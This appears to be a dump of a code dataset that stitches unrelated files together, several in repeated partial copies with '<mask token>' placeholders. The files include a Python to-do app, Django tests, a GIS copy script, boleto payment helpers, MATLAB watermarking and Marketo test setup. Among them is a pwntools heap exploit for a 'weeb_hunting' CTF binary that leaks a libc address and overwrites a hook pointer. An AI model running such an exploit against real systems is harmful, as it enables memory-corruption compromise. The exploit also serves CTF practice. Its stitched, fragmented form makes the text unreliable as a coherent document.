# rejected as well as text) - replaced with superior form from textbook
# example
# return float(phrase) # Return the number the user entered
# else:
# print("Error: Non-Numeric Entry Detected")
return float(phrase) # Return the number the user entered
def load_from_file(save_location): # This is a function for readability -
# opens txt file in read mode and loads it
"""The purpose of this function is to open the .txt save file and read
the contents into memory in the form of a list of custom ListItem
objects.
:param save_location: the location the save file is stored in
:returns a list of ListItem objects that is populated with the data from
the save file"""
# into an array (list) of ListItem variables
data_file_r = open(save_location, "r") # Open txt file in read mode
list_item = ["Text", -1, 2, True] # Item, Item Priority, group, is visible
todo = [] # make a list of lists
temp = 1 # Temporary counter variable to reconstruct lists from .txt file
line_counter = 1
try:
for item in data_file_r: # loop through each line in the file, one at
# a time - from w3schools.com
if (line_counter - 1) % 5 != 0 and line_counter > 0:
cleaned_item = ""
for character_index in range(len(
item)): # Loop through each character in the extracted
# string
if character_index != len(
item) - 1: # if it is not the last character, add
# it to the cleaned string
cleaned_item += item[character_index]
# Add every character to a
# but \n
if temp == 1: # Item Text
list_item[0] = cleaned_item
temp = 2
elif temp == 2: # Item Priority
list_item[1] = int(cleaned_item)
temp = 3
elif temp == 3: # Item Group
list_item[2] = int(cleaned_item)
temp = 4
elif temp == 4: # Is Visible
if cleaned_item == "False":
list_item[3] = False
else: # Assume the item is visible if the text is not
# False
list_item[3] = True
todo.insert(0, ListItem(list_item[0], list_item[1],
list_item[2], list_item[3]))
temp = 1
else: # If some error occurred and a condition outside of the
# possible four is met, restart
temp = 1
line_counter += 1
except ValueError:
print("An error has occurred trying to load the file")
result = int(clean_input(
"Please enter a 2 to overwrite the current save file and start "
"over or any other number to exit the program"))
if result == 2:
key = random.randint(2, 9) # Generate a random integer between 2
# and 9 to be used as a second dynamic check
if key == 2:
key = 1 # If the random number is 2, set it to one so that
# the same number (2) cannot be used as the verification number
result2 = int(clean_input("Are you sure you want to delete all "
"of your saved data\nEnter {0} to "
"proceed, or anything else to "
"cancel".format(str(key))))
if result2 == key:
data_file_w = open("C:Item_List.txt", "w")
data_file_w.close()
todo = []
print("Save Data Erased")
return todo # Return an empty list if file load failed
else:
print("Program Exiting")
quit(1)
else:
print("Program Exiting")
quit(1) # Exit the program with the exit code of 1
data_file_r.close()
# All the list functions above referenced from w3schools.com What is
# happening above: Opening the file, initializing a list to hold all
# four pieces of data, then after pulling the data from the file and
# storing in the list, it is copied (not referenced) into my main list
# of ListItem objects
return todo
def save_list(todo_list, save_location):
"""The purpose of this function is to save a list of ListItem objects to a
specified location in a .txt file with the first line of the document
being an explanation of the file format being used.
:param todo_list: the list of ListItem objects to save to the save file
:param save_location: the location to create or overwrite the save file
:returns nothing"""
data_file_w = open(save_location,
"w") # open the save file and clear the data from it
data_file_w.write("Warning: The Todo-List Program will not be able to "
"load this save file if it is incorrectly modified. "
"Modify at your own risk. The structure is Entry "
"Text, Entry Priority as a number, Entry Group as a "
"number (Not Yet Utilized, but necessary), and Entry "
"Visibility as a boolean, each on a separate line, a "
"single line gap in between, and the "
"very first line is skipped\n")
for item in todo_list:
data_file_w.write("{0}\n{1}\n{2}\n{3}\n\n".format(item.text,
str(item.priority),
str(item.group),
str(item.visible)))
data_file_w.close()
return
def add_item(todo_list):
"""The purpose of this function is to prompt the user for the two
fields of necessary information to make a new entry in the todo list,
the item name and priority, checking if the priority overlaps with an
existing entry in the todo list.
:param todo_list: the list of ListItem objects to add a new ListItem
object to
:returns nothing"""
text = input("Please enter the name of the new item\n")
priority = check_priority_overlap(
int(clean_input("Please enter the priority of this item")), todo_list)
# group = int(clean_input("Please enter the group number of this item"))
group = 0 # Set the group value to zero, group system NYI
visible = True
todo_list.insert(0, ListItem(text, priority, group, visible)) # Join
# the inputs to be added to the overall list
return
def select_item(todo_list, prompt='Error'): # Ask the user
# which item from the list is to be modified
"""The purpose of this function is to display a list of all items in the
todo list and number each individually to allow the user to select an
item to modify or delete. The available numbers may
skip some if some items are hidden
:param todo_list: the list of ListItem objects to display
:param prompt: the prompt to display to the user, default is Error
:returns the user selected item's index in a computer friendly form (
starting at 0 instead of 1)"""
valid = False
index = 0
while not valid:
counter = 1 # counter for index printing
for item in todo_list: # The range needs to be the length of the list
# being printed
if item.visible:
print(counter, item.text, sep='\t')
else:
print(counter, "~ {0} ~".format(item.text), sep='\t')
counter += 1
# Printing the item number, then the item, with a tab separating
# them
index = int(clean_input(prompt))
if index < counter:
valid = True
else:
print("Invalid Input: Number is too big")
return index - 1
def remove_item(todo_list):
"""The purpose of this function is to delete a ListItem object from a
list of ListItem objects by prompting the user for the index and
verifying they want to delete the item.
:param todo_list: the list of ListItem objects from which to remove
one object
:returns nothing"""
item = select_item(todo_list, "Please enter the item number you wish to "
"remove\nEnter a negative number or zero "
"to cancel")
if item >= 0: # 0, not 1 because the index returned is shifted to be
# computer friendly
todo_list.pop(item)
return
def mark_complete(todo_list):
"""The purpose of this function is to mark a selectedListItem object as
hidden and not to be printed unless specified, apart from selecting items.
:param todo_list: the list of ListItem objects to modify
:returns nothing"""
item = select_item(todo_list, "Please enter the item number you wish to "
"Mark Completed and hide from the "
"list\nEnter a negative number or zero to "
"cancel")
if item >= 0:
todo_list[item].visible = False
return
def edit_item(todo_list):
"""The purpose of this function is to edit a ListItem object in the
list of ListItem objects, changing either the name or priority
:param todo_list: the list of ListItem objects that gets one object
modified
:returns nothing"""
item = select_item(todo_list, "Please enter the item number you wish to "
"edit\nEnter a negative number or zero to "
"cancel")
if item >= 0:
while True:
value = clean_input("Which value would you like to edit? Enter:\n1"
" for the Item Text (Currently: {0})\n2 for "
"the Item Priority (Currently: {1})\n3 to "
"Cancel and Exit".format(todo_list[item].text,
str(todo_list[item].
priority)))
if value == 1: # Item Text Change
print("The Current Text is: {0}".format(todo_list[item].text))
todo_list[item].text = input("New Text:\n")
elif value == 2: # Item Priority Change
print("The Current Priority is: {0}".format(str(todo_list[item]
.priority)))
todo_list[item].priority = check_priority_overlap(
int(clean_input("New Priority:")), todo_list)
# elif value == 3: # Item Group Change
# print(f"The Current Group is: {todo_list[item].group}")
# todo_list[item].group = int(clean_input("New Group Number:"))
elif value == 3: # Exit Changing Menu
break
else:
print("Invalid Input - Please Try Again")
return
def check_list_status(todo_list): # Checks if the list is completely hidden
# (2), completely empty (1), or neither (0)
"""The purpose of this function is to check whether there are visible
items in the list, the entire list is hidden, or the list contains no
more ListItem objects
:param todo_list: the list of ListItem objects to check
:returns which condition using integer codes"""
if len(todo_list) == 0:
state = 1 # Empty List
else:
state = 2 # Entirely Hidden List
for item_index in range(len(todo_list)):
if todo_list[item_index].visible: # If an item is visible, then
# they are not all hidden
state = 0 # Neither
return state
def menu_loop(todo_list, save_file_location):
"""The purpose of this function is to repeatedly display the todo list
and user prompts menu until the program is closed
:param todo_list: the list of ListItem objects to display or modify
:param save_file_location: where the .txt save file is located for saving
:returns nothing"""
show_hidden = False
selection = 0
invalid_input = False
while selection != 6:
if invalid_input:
invalid_input = False
else:
print_list(save_file_location, todo_list, True, show_hidden)
divider(137 + 17) # Length of prompt statement below
list_status = check_list_status(todo_list)
if list_status == 0: # No Issues
selection = int(clean_input("Please enter: 1 for Add Item, 2 for "
"Remove Item, 3 for Edit Item, "
"4 for Mark Item Complete, "
"5 for Toggle Hidden, and 6 for "
"Exit, 7 for Concept "
"Demonstration\n"))
elif list_status == 1: # Empty List - No Remove, Edit, Mark, or Toggle
selection = int(clean_input("Please enter: 1 for Add Item, and 6 "
"for Exit, 7 for Concept "
"Demonstration\n"))
else: # Entirely Hidden List
selection = int(clean_input("Please enter: 1 for Add Item, 5 for "
"Toggle Hidden, and 6 for Exit, "
"7 for Concept Demonstration\n"))
# Uses the clean_input function above to get a number from the
# user, converting it to an int so a decimal won't return an
# invalid input in the following steps
print("") # Blank Print statement to add an extra blank line after
# user input before displaying response
if selection == 1: # Add Item - modify the list variable, then save
# to file
add_item(todo_list)
elif selection == 2: # Remove Item - modify the list variable, then
# save to file
if list_status == 0:
remove_item(todo_list)
elif list_status == 2:
print("Invalid Command: The Todo List has no visible items "
"to remove")
else:
print("Invalid Command: The Todo List has no items to remove")
elif selection == 3: # Edit Item - modify the list variable, then save
# to file
if list_status == 0:
edit_item(todo_list)
elif list_status == 2:
print("Invalid Command: The Todo List has no visible items "
"to edit")
else:
print("Invalid Command: The Todo List has no items to edit")
elif selection == 4: # Mark Item Complete - modify the list variable,
# then save to file
if list_status == 0:
mark_complete(todo_list)
elif list_status == 2:
print("Invalid Command: The Todo List has no visible items "
"to mark complete")
else:
print("Invalid Command: The Todo List has no items to mark "
"complete")
elif selection == 5: # Show Hidden - modify the list variable, then
# save to file
if list_status == 0 or list_status == 2:
if show_hidden:
print("No longer showing hidden items")
show_hidden = False
else:
print("Now showing hidden items")
show_hidden = True
else:
print("Invalid Command: The Todo List has no items to show or "
"hide")
elif selection == 6: # Exit Program
print("Now Closing")
elif selection == 7: # Extra section to demonstrate proficiency with
# topics covered in class - Sprint 1
concept_demonstration()
else:
invalid_input = True
print("Invalid Input\nPlease Try Again")
def main():
"""The purpose of this function is to ensure the save file exists at the
specified save file location, load the save file into memory, display a
welcome message with a divider, then start the menu loop until the
program is closed
:returns nothing"""
save_file_location = "Item_List.txt"
data_file_a = open(save_file_location, "a") # Opens ItemList.txt which
# is accessible in the file variable, in append mode (using this so that
# if the file exists, nothing happens, but if it does not exist, it gets
# created from w3schools.com
data_file_a.close() # Close the file, I now know it exists
loaded_list = load_from_file(save_file_location)
print("Welcome to the To-Do List - Version: 0.1.2")
divider(42) # Length of welcome statement above
menu_loop(loaded_list, save_file_location)
if __name__ == "__main__":
main()
| [
8,
11,
12,
18,
24
] |
633 | b7ccb41c43a0db6f1bf9e6ba5cef1b9b1417e297 | "Unit tests for reverse URL lookup"
from django.core.urlresolvers import reverse_helper, NoReverseMatch
import re, unittest
test_data = (
('^places/(\d+)/$', 'places/3/', [3], {}),
('^places/(\d+)/$', 'places/3/', ['3'], {}),
('^places/(\d+)/$', NoReverseMatch, ['a'], {}),
('^places/(\d+)/$', NoReverseMatch, [], {}),
('^places/(?P<id>\d+)/$', 'places/3/', [], {'id': 3}),
('^people/(?P<name>\w+)/$', 'people/adrian/', ['adrian'], {}),
('^people/(?P<name>\w+)/$', 'people/adrian/', [], {'name': 'adrian'}),
('^people/(?P<name>\w+)/$', NoReverseMatch, ['name with spaces'], {}),
('^people/(?P<name>\w+)/$', NoReverseMatch, [], {'name': 'name with spaces'}),
('^people/(?P<name>\w+)/$', NoReverseMatch, [], {}),
('^hardcoded/$', 'hardcoded/', [], {}),
('^hardcoded/$', 'hardcoded/', ['any arg'], {}),
('^hardcoded/$', 'hardcoded/', [], {'kwarg': 'foo'}),
('^people/(?P<state>\w\w)/(?P<name>\w+)/$', 'people/il/adrian/', [], {'state': 'il', 'name': 'adrian'}),
('^people/(?P<state>\w\w)/(?P<name>\d)/$', NoReverseMatch, [], {'state': 'il', 'name': 'adrian'}),
('^people/(?P<state>\w\w)/(?P<name>\w+)/$', NoReverseMatch, [], {'state': 'il'}),
('^people/(?P<state>\w\w)/(?P<name>\w+)/$', NoReverseMatch, [], {'name': 'adrian'}),
('^people/(?P<state>\w\w)/(\w+)/$', NoReverseMatch, ['il'], {'name': 'adrian'}),
('^people/(?P<state>\w\w)/(\w+)/$', 'people/il/adrian/', ['adrian'], {'state': 'il'}),
)
class URLPatternReverse(unittest.TestCase):
def test_urlpattern_reverse(self):
for regex, expected, args, kwargs in test_data:
try:
got = reverse_helper(re.compile(regex), *args, **kwargs)
except NoReverseMatch, e:
self.assertEqual(expected, NoReverseMatch)
else:
self.assertEquals(got, expected)
if __name__ == "__main__":
run_tests(1)
| null | null | null | null | [
0
] |
634 | 778cf8064fa45e3e25a66f2165dcf6885c72fb8a | <mask token>
| <mask token>
os.system('dir ' + org_GIS + '*' + ext + ' /s/d/b >' + org_GIS + 'tempext.txt')
<mask token>
for line in lines:
ln = line.rstrip('\n')
shutil.copy(ln, outputfolder)
file1.close()
os.system('del ' + org_GIS + 'tempext.txt')
raw_input('done!')
| <mask token>
org_GIS = raw_input(
'provide path to GIS folder in dropbox : eg. C:\\Dropbox\\Barcin_Hoyuk\\AIS_Barcin_Hoyuk\\AIS\\GIS\\: '
)
outputfolder = raw_input('provide path to output folder : eg. C:\\Temp\\: ')
ext = raw_input('provide extention type to be copied eg .tif or .jpg :')
os.system('dir ' + org_GIS + '*' + ext + ' /s/d/b >' + org_GIS + 'tempext.txt')
file1 = open(org_GIS + 'tempext.txt', 'r')
lines = file1.readlines()
for line in lines:
ln = line.rstrip('\n')
shutil.copy(ln, outputfolder)
file1.close()
os.system('del ' + org_GIS + 'tempext.txt')
raw_input('done!')
| import shutil
import os
org_GIS = raw_input(
'provide path to GIS folder in dropbox : eg. C:\\Dropbox\\Barcin_Hoyuk\\AIS_Barcin_Hoyuk\\AIS\\GIS\\: '
)
outputfolder = raw_input('provide path to output folder : eg. C:\\Temp\\: ')
ext = raw_input('provide extention type to be copied eg .tif or .jpg :')
os.system('dir ' + org_GIS + '*' + ext + ' /s/d/b >' + org_GIS + 'tempext.txt')
file1 = open(org_GIS + 'tempext.txt', 'r')
lines = file1.readlines()
for line in lines:
ln = line.rstrip('\n')
shutil.copy(ln, outputfolder)
file1.close()
os.system('del ' + org_GIS + 'tempext.txt')
raw_input('done!')
| # This script allows you to copy all files with a certain extention to a new folder without integrating the sub folders
# Created by Maurice de Kleijn Vrije Universiteit Amsterdam Spatial Information laboratory for the datamanagement of the the archaological project Barin Hoyuk
# 22062016 Python 2.7
import shutil
import os
org_GIS = raw_input("provide path to GIS folder in dropbox : eg. C:\Dropbox\Barcin_Hoyuk\AIS_Barcin_Hoyuk\AIS\GIS\\: ")
outputfolder = raw_input("provide path to output folder : eg. C:\Temp\: ")
ext = raw_input("provide extention type to be copied eg .tif or .jpg :")
os.system('dir ' + org_GIS + '*' + ext + ' /s/d/b >' + org_GIS + 'tempext.txt')
file1 = open(org_GIS + 'tempext.txt', 'r')
lines = file1.readlines()
for line in lines:
ln = line.rstrip('\n')
shutil.copy(ln, outputfolder)
file1.close()
os.system('del ' + org_GIS + 'tempext.txt')
raw_input("done!")
| [
0,
1,
2,
3,
4
] |
635 | 56d3e59e3e077b1febb834668aba44ce8dba13ae | clear ;
clc;
%-----------------------读入图像-------------------------------------%
markbefore=imread('p203.bmp');
markbefore2=rgb2gray(markbefore);
mark=im2bw(markbefore2);
figure(1);
subplot(2,3,1);
imshow(mark),title('水印图像');
[rm,cm]=size(mark);
cover=imread('pic.bmp');
cover1=imresize(cover,[512,512]);
cover_image=rgb2gray(cover1);
subplot(2,3,2),imshow(cover_image,[]),title('原始图像');
before=blkproc(cover_image,[8 8],'dct2'); %将载体图像的灰度层分为8×8的小块,每一块内做二维DCT变换,结果记入矩阵before
I=mark;
alpha=50; %尺度因子,控制水印添加的强度,决定了频域系数被修改的幅度
k1=randn(1,8); %产生两个不同的随机序列
k2=randn(1,8);
after=before; %初始化载入水印的结果矩阵
for i=1:rm %在中频段嵌入水印
for j=1:cm
x=(i-1)*8;
y=(j-1)*8;
if mark(i,j)==1
k=k1;
else
k=k2;
end;
after(x+1,y+8)=before(x+1,y+8)+alpha*k(1);
after(x+2,y+7)=before(x+2,y+7)+alpha*k(2);
after(x+3,y+6)=before(x+3,y+6)+alpha*k(3);
after(x+4,y+5)=before(x+4,y+5)+alpha*k(4);
after(x+5,y+4)=before(x+5,y+4)+alpha*k(5);
after(x+6,y+3)=before(x+6,y+3)+alpha*k(6);
after(x+7,y+2)=before(x+7,y+2)+alpha*k(7);
after(x+8,y+1)=before(x+8,y+1)+alpha*k(8);
end;
end;
result=blkproc(after,[8 8],'idct2'); %将经处理的图像分为8×8的小块,每一块内做二维DCT逆变换
result = uint8(result);
imwrite(result,'watermarked.bmp','bmp'); %隐写图像命名为watermarked.bmp
subplot(2,3,3),imshow(result,[]),title('隐写图像');
subplot(2,3,4);
imshow(result,[]);
title('水印图像');
withmark=result;
subplot(2,3,4);
imshow(result,[]);
title('图像');
withmark=result;
%------------------------水印提取-----------------------------%
%
after_2=blkproc(withmark,[8,8],'dct2'); %此步开始提取水印,将灰度层分块进行DCT变换
p=zeros(1,8); %初始化提取数值用的矩阵
mark_2 = zeros(rm,cm);
for i=1:rm
for j=1:cm
x=(i-1)*8;y=(j-1)*8;
p(1)=after_2(x+1,y+8); %将之前改变过数值的点的数值提取出来
p(2)=after_2(x+2,y+7);
p(3)=after_2(x+3,y+6);
p(4)=after_2(x+4,y+5);
p(5)=after_2(x+5,y+4);
p(6)=after_2(x+6,y+3);
p(7)=after_2(x+7,y+2);
p(8)=after_2(x+8,y+1);
if corr2(p,k1)>corr2(p,k2) %corr2计算两个矩阵的相似度,越接近1相似度越大
mark_2(i,j)=1; %比较提取出来的数值与随机频率k1和k2的相似度,还原水印图样
else
mark_2(i,j)=0;
end
end
end
subplot(2,3,5);
mark_2 = uint8(mark_2);
imshow(mark_2,[]),title('提取水印');
subplot(2,3,6);
imshow(mark),title('原水印图像');
| null | null | null | null | [
0
] |
636 | 5eb4c71869b077dac0d61072c99d801030395fc2 | <mask token>
| <mask token>
pwnlib.gdb.attach(p)
<mask token>
while 'You found a' not in r:
r = p.recvuntil('>')
p.send('AAAA\n')
p.send('AAAA\n')
<mask token>
while 'You found a' not in r:
r = p.recvuntil('>')
p.send('AAAA\n')
p.send('AAAA\n')
<mask token>
while 'You found a' not in r:
r = p.recvuntil('>')
p.send('AAAA\n')
p.send('\n')
<mask token>
while 'You found a' not in r:
r = p.recvuntil('>')
p.send('\n')
p.send('\n')
<mask token>
while '10. empty' not in r:
p.send('\n')
r = p.recv()
p.sendline('1')
<mask token>
while '10. empty' not in r:
p.send('\n')
r = p.recv()
p.sendline('4')
<mask token>
while 'You found a' not in r:
p.send('\n')
r = p.recv()
p.sendline('A"`')
<mask token>
while 'You found a' not in r:
p.send('\n')
r = p.recv()
p.sendline('AAAA')
<mask token>
while 'You found a' not in r:
p.send('\n')
r = p.recv()
p.sendline('AAAA')
<mask token>
while 'You found a sword' not in r:
p.send('\n')
r = p.recv()
p.sendline('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA` `')
<mask token>
while '10. empty' not in r:
p.send('\n')
r = p.recv()
<mask token>
log.info(hex(__srandom))
<mask token>
log.info('Fake chunk: ' + hex(hook))
p.sendline('2')
<mask token>
while '10. empty' not in r:
p.send('\n')
r = p.recv()
p.sendline('3')
<mask token>
while '10. empty' not in r:
p.send('\n')
r = p.recv()
p.sendline('4')
<mask token>
while '10. empty' not in r:
p.send('\n')
r = p.recv()
p.sendline('3')
<mask token>
while 'You found a' not in r:
p.send('\n')
r = p.recv()
p.sendline(p64(hook)[:6])
p.interactive()
| <mask token>
p = process('./weeb_hunting')
elf = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
pwnlib.gdb.attach(p)
r = p.recv()
while 'You found a' not in r:
r = p.recvuntil('>')
p.send('AAAA\n')
p.send('AAAA\n')
r = p.recv()
while 'You found a' not in r:
r = p.recvuntil('>')
p.send('AAAA\n')
p.send('AAAA\n')
r = p.recv()
while 'You found a' not in r:
r = p.recvuntil('>')
p.send('AAAA\n')
p.send('\n')
r = p.recv()
while 'You found a' not in r:
r = p.recvuntil('>')
p.send('\n')
p.send('\n')
r = p.recv()
while '10. empty' not in r:
p.send('\n')
r = p.recv()
p.sendline('1')
r = p.recv()
while '10. empty' not in r:
p.send('\n')
r = p.recv()
p.sendline('4')
r = p.recv()
while 'You found a' not in r:
p.send('\n')
r = p.recv()
p.sendline('A"`')
r = p.recv()
while 'You found a' not in r:
p.send('\n')
r = p.recv()
p.sendline('AAAA')
r = p.recv()
while 'You found a' not in r:
p.send('\n')
r = p.recv()
p.sendline('AAAA')
r = p.recv()
while 'You found a sword' not in r:
p.send('\n')
r = p.recv()
p.sendline('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA` `')
r = p.recv()
while '10. empty' not in r:
p.send('\n')
r = p.recv()
__srandom = u64((r.split('1. ')[1].split('\n')[0] + '\x00' * 8)[:8])
log.info(hex(__srandom))
hook = __srandom + 3711517
log.info('Fake chunk: ' + hex(hook))
p.sendline('2')
r = p.recv()
while '10. empty' not in r:
p.send('\n')
r = p.recv()
p.sendline('3')
r = p.recv()
while '10. empty' not in r:
p.send('\n')
r = p.recv()
p.sendline('4')
r = p.recv()
while '10. empty' not in r:
p.send('\n')
r = p.recv()
p.sendline('3')
r = p.recv()
while 'You found a' not in r:
p.send('\n')
r = p.recv()
p.sendline(p64(hook)[:6])
p.interactive()
| from pwn import *
p = process('./weeb_hunting')
elf = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
pwnlib.gdb.attach(p)
r = p.recv()
while 'You found a' not in r:
r = p.recvuntil('>')
p.send('AAAA\n')
p.send('AAAA\n')
r = p.recv()
while 'You found a' not in r:
r = p.recvuntil('>')
p.send('AAAA\n')
p.send('AAAA\n')
r = p.recv()
while 'You found a' not in r:
r = p.recvuntil('>')
p.send('AAAA\n')
p.send('\n')
r = p.recv()
while 'You found a' not in r:
r = p.recvuntil('>')
p.send('\n')
p.send('\n')
r = p.recv()
while '10. empty' not in r:
p.send('\n')
r = p.recv()
p.sendline('1')
r = p.recv()
while '10. empty' not in r:
p.send('\n')
r = p.recv()
p.sendline('4')
r = p.recv()
while 'You found a' not in r:
p.send('\n')
r = p.recv()
p.sendline('A"`')
r = p.recv()
while 'You found a' not in r:
p.send('\n')
r = p.recv()
p.sendline('AAAA')
r = p.recv()
while 'You found a' not in r:
p.send('\n')
r = p.recv()
p.sendline('AAAA')
r = p.recv()
while 'You found a sword' not in r:
p.send('\n')
r = p.recv()
p.sendline('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA` `')
r = p.recv()
while '10. empty' not in r:
p.send('\n')
r = p.recv()
__srandom = u64((r.split('1. ')[1].split('\n')[0] + '\x00' * 8)[:8])
log.info(hex(__srandom))
hook = __srandom + 3711517
log.info('Fake chunk: ' + hex(hook))
p.sendline('2')
r = p.recv()
while '10. empty' not in r:
p.send('\n')
r = p.recv()
p.sendline('3')
r = p.recv()
while '10. empty' not in r:
p.send('\n')
r = p.recv()
p.sendline('4')
r = p.recv()
while '10. empty' not in r:
p.send('\n')
r = p.recv()
p.sendline('3')
r = p.recv()
while 'You found a' not in r:
p.send('\n')
r = p.recv()
p.sendline(p64(hook)[:6])
p.interactive()
| from pwn import *
p = process("./weeb_hunting")
elf = ELF("/lib/x86_64-linux-gnu/libc-2.23.so")
pwnlib.gdb.attach(p)
r = p.recv()
while "You found a" not in r:
r = p.recvuntil(">")
p.send("AAAA\n")
p.send("AAAA\n")
r = p.recv()
while "You found a" not in r:
r = p.recvuntil(">")
p.send("AAAA\n")
p.send("AAAA\n")
r = p.recv()
while "You found a" not in r:
r = p.recvuntil(">")
p.send("AAAA\n")
p.send("\n")
r = p.recv()
while "You found a" not in r:
r = p.recvuntil(">")
p.send("\n")
p.send("\n")
r = p.recv()
while "10. empty" not in r:
p.send("\n")
r = p.recv()
p.sendline("1")
r = p.recv()
while "10. empty" not in r:
p.send("\n")
r = p.recv()
p.sendline("4")
r = p.recv()
while "You found a" not in r:
p.send("\n")
r = p.recv()
p.sendline('\x41\x22\x60')
r = p.recv()
while "You found a" not in r:
p.send("\n")
r = p.recv()
p.sendline('AAAA')
r = p.recv()
while "You found a" not in r:
p.send("\n")
r = p.recv()
p.sendline('AAAA')
r = p.recv()
while "You found a sword" not in r:
p.send("\n")
r = p.recv()
p.sendline("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA` `")
r = p.recv()
while "10. empty" not in r:
p.send("\n")
r = p.recv()
__srandom = u64((r.split("1. ")[1].split("\n")[0] + "\x00"*8)[:8])
log.info(hex(__srandom))
hook = __srandom + 0x38A21D
log.info("Fake chunk: " + hex(hook))
p.sendline("2")
r = p.recv()
while "10. empty" not in r:
p.send("\n")
r = p.recv()
p.sendline("3")
r = p.recv()
while "10. empty" not in r:
p.send("\n")
r = p.recv()
p.sendline("4")
r = p.recv()
while "10. empty" not in r:
p.send("\n")
r = p.recv()
p.sendline("3")
r = p.recv()
while "You found a" not in r:
p.send("\n")
r = p.recv()
p.sendline(p64(hook)[:6])
p.interactive()
| [
0,
1,
2,
3,
4
] |
637 | 383d3b35fbfb7921111b28c3160173ce1c200387 | <mask token>
| <mask token>
def generateExampleBoletoPaymentsJson(n=1, next_day=False):
boletos = generateExampleBoletosJson(n=n)
boletos = starkbank.boleto.create(boletos)
payments = []
for boleto in boletos:
payment = deepcopy(example_payment)
payment.line = boleto.line
payment.scheduled = min(date.today() + timedelta(days=1) if
next_day else date.today(), (boleto.due - timedelta(hours=3)).
date())
payment.description = sha256(str(boleto.id).encode('utf-8')).hexdigest(
)
payments.append(payment)
return payments
| <mask token>
example_payment = BoletoPayment(line=
'34191.09008 61713.957308 71444.640008 2 83430000984732', scheduled=
'2020-02-29', description='loading a random account', tax_id=
'20.018.183/0001-80')
def generateExampleBoletoPaymentsJson(n=1, next_day=False):
boletos = generateExampleBoletosJson(n=n)
boletos = starkbank.boleto.create(boletos)
payments = []
for boleto in boletos:
payment = deepcopy(example_payment)
payment.line = boleto.line
payment.scheduled = min(date.today() + timedelta(days=1) if
next_day else date.today(), (boleto.due - timedelta(hours=3)).
date())
payment.description = sha256(str(boleto.id).encode('utf-8')).hexdigest(
)
payments.append(payment)
return payments
| from copy import deepcopy
from datetime import date, timedelta
from hashlib import sha256
import starkbank
from starkbank import BoletoPayment
from .boleto import generateExampleBoletosJson
example_payment = BoletoPayment(line=
'34191.09008 61713.957308 71444.640008 2 83430000984732', scheduled=
'2020-02-29', description='loading a random account', tax_id=
'20.018.183/0001-80')
def generateExampleBoletoPaymentsJson(n=1, next_day=False):
boletos = generateExampleBoletosJson(n=n)
boletos = starkbank.boleto.create(boletos)
payments = []
for boleto in boletos:
payment = deepcopy(example_payment)
payment.line = boleto.line
payment.scheduled = min(date.today() + timedelta(days=1) if
next_day else date.today(), (boleto.due - timedelta(hours=3)).
date())
payment.description = sha256(str(boleto.id).encode('utf-8')).hexdigest(
)
payments.append(payment)
return payments
| from copy import deepcopy
from datetime import date, timedelta
from hashlib import sha256
import starkbank
from starkbank import BoletoPayment
from .boleto import generateExampleBoletosJson
example_payment = BoletoPayment(
line="34191.09008 61713.957308 71444.640008 2 83430000984732",
scheduled="2020-02-29",
description="loading a random account",
tax_id="20.018.183/0001-80",
)
def generateExampleBoletoPaymentsJson(n=1, next_day=False):
boletos = generateExampleBoletosJson(n=n)
boletos = starkbank.boleto.create(boletos)
payments = []
for boleto in boletos:
payment = deepcopy(example_payment)
payment.line = boleto.line
payment.scheduled = min((date.today() + timedelta(days=1)) if next_day else date.today(), (boleto.due - timedelta(hours=3)).date())
payment.description = sha256(str(boleto.id).encode('utf-8')).hexdigest()
payments.append(payment)
return payments
| [
0,
1,
2,
3,
4
] |
638 | b05a5fcbba74bf4108bc953c6f868eb1f5ca298f | from pymarketo.client import MarketoClientFactory
import os
import sys #@UnusedImport
import time #@UnusedImport
import datetime #@UnusedImport
from pprint import pprint #@UnresolvedImport
TESTDIR = os.path.split(__file__)[0]
PACKAGEDIR = os.path.join(TESTDIR,"..")
INIFILE = os.path.join(PACKAGEDIR,"marketo.ini")
DATAFILES=["specification","listMObjects"]
# The following must be set up on your marketo account to enable tests
LEADEMAIL = "[email protected]" # Email of an internal contact
LEADLIST = "2wr-0" # List name containing LEADEMAIL contact
SPECIALCODE = "WebReplyJobCode" # If your leads have a custom field that can be
SPECIALVALUE= "WEBREPLY" # asserted for LEADEMAIL, set them here
TESTCAMPAIGN = "SOAP API Access test" # Name of test campaign that has SOAP API trigger enabled
DELETECAMPAIGN = "Delete lead" # Campaign configure to delete leads added to the campaign
# First and last names, and synthetic email addresses for new leads
# These will be added and then deleted
TESTDOMAIN="webreply.com"
TESTNAMES = [("One","Test",TESTDOMAIN),("Two","Test",TESTDOMAIN)]
TESTEMAILS = ["%s.%s@%s" % name for name in TESTNAMES]
mc = MarketoClientFactory(INIFILE)
def compareData(datafile, data):
path = os.path.join(TESTDIR,datafile+".txt")
return open(path).read().strip() == data.strip()
def test_data():
"Make sure that all the test data files are present"
assert os.path.exists(INIFILE)
for datafile in DATAFILES:
assert os.path.exists(os.path.join(TESTDIR,datafile+".txt"))
# Factory methods to build structures for arguments
def aStringArray(strings):
asa = mc.factory.create("ArrayOfString")
asa.stringItem = strings
return asa
def aLeadKey(email=None,id=None):
leadkey = mc.factory.create("LeadKey")
if email:
leadkey.keyType = "EMAIL"
leadkey.keyValue = email
elif id:
leadkey.keyType = "IDNUM"
leadkey.keyValue = id
return leadkey
def aLeadKeyArray(leads):
lka = mc.factory.create("ArrayOfLeadKey")
lka.leadKey = leads
return lka
def aListKey(lk, keyType = "MKTOLISTNAME"):
listkey = mc.factory.create("ListKey")
listkey.keyType = keyType
listkey.keyValue = lk
return listkey
def anAttrib(**kwargs):
attrib = mc.factory.create("Attrib")
for key, value in kwargs.items():
setattr(attrib, key, value)
return attrib
def anAttribArray(attribs):
aa = mc.factory.create("ArrayOfAttrib")
aa.attrib=attribs
return aa
def anAttribute(**kwargs):
attrib = mc.factory.create("Attribute")
for key, value in kwargs.items():
setattr(attrib, key, value)
return attrib
def anAttributeArray(attributes):
aa = mc.factory.create("ArrayOfAttribute")
aa.attribute=attributes
return aa
def aLeadRecord(id=None, email=None, foreignsyspersonid=None,foreignsystype=None,attributes=None):
lr = mc.factory.create("LeadRecord")
if id:
lr.Id = id
elif email:
lr.Email = email
elif foreignsyspersonid:
assert foreignsystype
